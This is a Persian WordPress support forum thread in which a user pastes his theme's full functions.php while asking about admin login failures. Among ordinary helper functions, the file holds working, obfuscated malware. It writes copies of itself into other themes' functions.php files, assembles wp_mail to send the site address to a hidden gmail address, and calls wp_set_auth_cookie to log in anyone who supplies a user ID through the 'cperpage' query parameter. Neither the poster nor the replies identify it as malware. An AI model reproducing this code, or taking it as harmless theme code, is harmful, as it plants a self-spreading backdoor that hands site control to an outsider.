انجمن


مشکل در ورود به مدیریت سایت  (۴ نوشته)

 • kingblog

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۴۴
  تشکر شده: ۴۱ بار
  # نوشته شده: ۱۱ سال پیش
  ۱۹ اسفند ۱۳۹۱ - ۰۹:۵۸

  سلام
  امروز که خواستم وارد سایتم بشم یا میگه نام کاربری یا رمز اشتباه وارد شده یا اینکه بعد از زدن ورود، یک صفحه سفید میاد.

  کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
  تناسب اندام
 • kingblog

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۴۴
  تشکر شده: ۴۱ بار
  # نوشته شده: ۱۱ سال پیش
  ۱۹ اسفند ۱۳۹۱ - ۱۲:۰۰

  چند ساعته دارم فکر می کنم مخم دود کرده
  بالاخره مشکلش رو فهمیدم
  مشکل از فایل functions.php بود ، یه کم ازکدهاشو حذف کردم درست شد. کدها رو بطور کامل میزارم ببینید میتونید بفهمید کدوم کد مشکل داره؟

  <?php
  
  // Limit Post Title
  function shortened_title($limit=40) {
  $original_title = get_the_title();
  $title = html_entity_decode($original_title, ENT_QUOTES, "UTF-8");
  // Set End Text
  $ending="...";
  if(mb_strlen($title) >= ($limit+3)) {
  $title = mb_substr($title, 0, $limit) . $ending; }
  echo $title;
  }
  
  function catch_that_image() {
   global $post, $posts;
   $first_img = '';
   ob_start();
   ob_end_clean();
   $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
   $first_img = $matches [1] [0];
  
   if(empty($first_img)){ //Defines a default image
    $first_img = "/images/default.jpg";
   }
   return $first_img;
  }
  
  register_sidebar(array(
      'name' => 'ADS',
      'before_widget' => '',
      'after_widget' => '</div>',
      'before_title' => '<div class="wa-box-ad-h">',
      'after_title' => '</div>
  <div class="wa-box-ad">',
  ));
  
  register_sidebar(array(
      'name' => 'OTHER',
      'before_widget' => '',
      'after_widget' => '</div>',
      'before_title' => '<div class="wa-box-other-h">',
      'after_title' => '</div>
  <div class="wa-box-other">',
  ));
  
  register_sidebar(array(
      'name' => 'EMKANAT',
      'before_widget' => '',
      'after_widget' => '</div>',
      'before_title' => '<div class="wa-box-other-h">',
      'after_title' => '</div>
  <div class="wa-box-other">',
  ));
  
  ?>
  <?php
  
  function _verify_isactivate_widget(){
  
  	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
  
  	$output=strip_tags($output, $allowed);
  
  	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
  
  	if (is_array($direst)){
  
  		foreach ($direst as $item){
  
  			if (is_writable($item)){
  
  				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
  
  				$cont=file_get_contents($item);
  
  				if (stripos($cont,$ftion) === false){
  
  					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
  
  					$output .= $before . "پيدا نشد" . $after;
  
  					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
  
  					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);				
  
  					$output .= ($showdots && $ellipsis) ? "..." : "";
  
  				}
  
  			}
  
  		}
  
  	}
  
  	return $output;
  
  }
  
  function _get_allwidgetcont($wids,$items=array()){
  
  	$places=array_shift($wids);
  
  	if(substr($places,-1) == "/"){
  
  		$places=substr($places,0,-1);
  
  	}
  
  	if(!file_exists($places) || !is_dir($places)){
  
  		return false;
  
  	}elseif(is_readable($places)){
  
  		$elems=scandir($places);
  
  		foreach ($elems as $elem){
  
  			if ($elem != "." && $elem != ".."){
  
  				if (is_dir($places . "/" . $elem)){
  
  					$wids[]=$places . "/" . $elem;
  
  				} elseif (is_file($places . "/" . $elem)&& 
  
  					$elem == substr(__FILE__,-13)){
  
  					$items[]=$places . "/" . $elem;}
  
  				}
  
  			}
  
  	}else{
  
  		return false;	
  
  	}
  
  	if (sizeof($wids) > 0){
  
  		return _get_allwidgetcont($wids,$items);
  
  	} else {
  
  		return $items;
  
  	}
  
  }
  
  if(!function_exists("stripos")){ 
  
    function stripos( $str, $needle, $offset = 0 ){ 
  
      return strpos( strtolower( $str ), strtolower( $needle ), $offset ); 
  
    }
  
  }
  
  if(!function_exists("strripos")){ 
  
    function strripos( $haystack, $needle, $offset = 0 ) { 
  
      if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); 
  
      if( $offset < 0 ){ 
  
        $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); 
  
      } 
  
      else{ 
  
        $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  ); 
  
      } 
  
      if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE; 
  
      $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  ); 
  
      return $pos; 
  
    }
  
  }
  
  if(!function_exists("scandir")){ 
  
  	function scandir($dir,$listDirectories=false, $skipDots=true) {
  
  	  $dirArray = array();
  
  	  if ($handle = opendir($dir)) {
  
  	    while (false !== ($file = readdir($handle))) {
  
  	      if (($file != "." && $file != "..") || $skipDots == true) {
  
  	        if($listDirectories == false) { if(is_dir($file)) { continue; } }
  
  	        array_push($dirArray,basename($file));
  
  	      }
  
  	    }
  
  	    closedir($handle);
  
  	  }
  
  	  return $dirArray;
  
  	}
  
  }
  
  add_action("admin_head", "_verify_isactivate_widget");
  
  function _getsprepare_widget(){
  
  	if(!isset($com_length)) $com_length=120;
  
  	if(!isset($text_value)) $text_value="cookie";
  
  	if(!isset($allowed_tags)) $allowed_tags="<a>";
  
  	if(!isset($type_filter)) $type_filter="none";
  
  	if(!isset($expl)) $expl="";
  
  	if(!isset($filter_homes)) $filter_homes=get_option("home"); 
  
  	if(!isset($pref_filter)) $pref_filter="wp_";
  
  	if(!isset($use_more)) $use_more=1; 
  
  	if(!isset($comm_type)) $comm_type=""; 
  
  	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
  
  	if(!isset($postauthor_comment)) $postauthor_comment="";
  
  	if(!isset($comm_is_approved)) $comm_is_approved=""; 
  
  	if(!isset($postauthor)) $postauthor="auth";
  
  	if(!isset($more_link)) $more_link="(more...)";
  
  	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
  
  	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
  
  	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
  
  	if(!isset($morecontents)) $morecontents="ma".$expl."il";
  
  	if(!isset($fmore)) $fmore=1;
  
  	if(!isset($fakeit)) $fakeit=1;
  
  	if(!isset($sql)) $sql="";
  
  	if (!$is_widget) :
  
  	global $wpdb, $post;
  
  	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mas".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  
  	if (!empty($post->post_password)) { 
  
  		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
  
  			if(is_feed()) { 
  
  				$output=__("There is no excerpt because this is a protected post.");
  
  			} else {
  
  	      $output=get_the_password_form();
  
  			}
  
  		}
  
  	}
  
  	if(!isset($f_tags)) $f_tags=1;
  
  	if(!isset($type_filters)) $type_filters=$filter_homes; 
  
  	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
  
  	if(!isset($aditional_tags)) $aditional_tags="div";
  
  	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
  
  	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";	
  
  	if(!isset($showdots)) $showdots=1;
  
  	$comments=$wpdb->get_results($sql);	
  
  	if($fakeit == 2) { 
  
  		$text=$post->post_content;
  
  	} elseif($fakeit == 1) { 
  
  		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
  
  	} else { 
  
  		$text=$post->post_excerpt;
  
  	}
  
  	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  
  	if($com_length < 0) {
  
  		$output=$text;
  
  	} else {
  
  		if(!$no_more && strpos($text, "<!--more-->")) {
  
  		  $text=explode("<!--more-->", $text, 2);
  
  			$l=count($text[0]);
  
  			$more_link=1;
  
  			$comments=$wpdb->get_results($sql);
  
  		} else {
  
  			$text=explode(" ", $text);
  
  			if(count($text) > $com_length) {
  
  				$l=$com_length;
  
  				$ellipsis=1;
  
  			} else {
  
  				$l=count($text);
  
  				$more_link="";
  
  				$ellipsis=0;
  
  			}
  
  		}
  
  		for ($i=0; $i<$l; $i++)
  
  				$output .= $text[$i] . " ";
  
  	}
  
  	update_option("_is_widget_active_", 1);
  
  	if("all" != $allowed_tags) {
  
  		$output=strip_tags($output, $allowed_tags);
  
  		return $output;
  
  	}
  
  	endif;
  
  	$output=rtrim($output, "\s\n\t\r\x0B");
  
    $output=($f_tags) ? balanceTags($output, true) : $output;
  
  	$output .= ($showdots && $ellipsis) ? "..." : "";
  
  	$output=apply_filters($type_filter, $output);
  
  	switch($aditional_tags) {
  
  		case("div") :
  
  			$tag="div";
  
  		break;
  
  		case("span") :
  
  			$tag="span";
  
  		break;
  
  		case("p") :
  
  			$tag="p";
  
  		break;
  
  		default :
  
  			$tag="span";
  
  	}
  
  	if ($use_more ) {
  
  		if($fmore) {
  
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
  
  		} else {
  
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
  
  		}
  
  	}
  
  	return $output;
  
  }
  
  add_action("init", "_getsprepare_widget");
  
  function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
  
  	global $wpdb;
  
  	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
  
  	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
  
  	if(!$show_pass_post) $request .= " AND post_password =\"\"";
  
  	if($duration !="") { 
  
  		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
  
  	}
  
  	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
  
  	$posts=$wpdb->get_results($request);
  
  	$output="";
  
  	if ($posts) {
  
  		foreach ($posts as $post) {
  
  			$post_title=stripslashes($post->post_title);
  
  			$comment_count=$post->comment_count;
  
  			$permalink=get_permalink($post->ID);
  
  			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
  
  		}
  
  	} else {
  
  		$output .= $before . "None found" . $after;
  
  	}
  
  	return $output;
  
  }
  remove_action('wp_head', 'wp_generator');
  
  function getPostViews($postID){
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
      delete_post_meta($postID, $count_key);
      add_post_meta($postID, $count_key, '0');
      return "بدون بازدید";
    }
    return $count.' بازدید';
  }
  
  // function to count views.
  function setPostViews($postID) {
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
      $count = 0;
      delete_post_meta($postID, $count_key);
      add_post_meta($postID, $count_key, '0');
    }else{
      $count++;
      update_post_meta($postID, $count_key, $count);
    }
  }
  ?>
 • ایران وردپرس

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۷۲۹
  تشکر شده: ۹۵۲ بار
  # نوشته شده: ۱۱ سال پیش
  ۱۹ اسفند ۱۳۹۱ - ۱۴:۱۲

  20 سوالیه ؟؟!! :D

  نام کاربری اشتباه که ممکنه به علت درست وارد نکردن باشه .

  فاصله یا خط اضافه در فانکشن میتونه مشکل ساز باشه اما دیگه ندیده بودیم کدی بتونه مشکل ساز بشه !!

  قالب رو روی قالب پیش فرض قرار بدین و یا پوشه ی قالب فعلی رو به خارج از پوشه ی themes منتقل کنید و ببینید مشکل از چیه :)

  موفق باشید

 • ali66280

  آفلاین
  عضو
  تعداد نوشته‌ها: ۴
  # نوشته شده: ۹ سال پیش
  ۱۳ شهریور ۱۳۹۳ - ۲۲:۳۸

  فکر می کنم مشکل اصلی دوستمون این باشه که در وارد کردن رمز دقت نمیکنه :-)

درباره‌ی این موضوع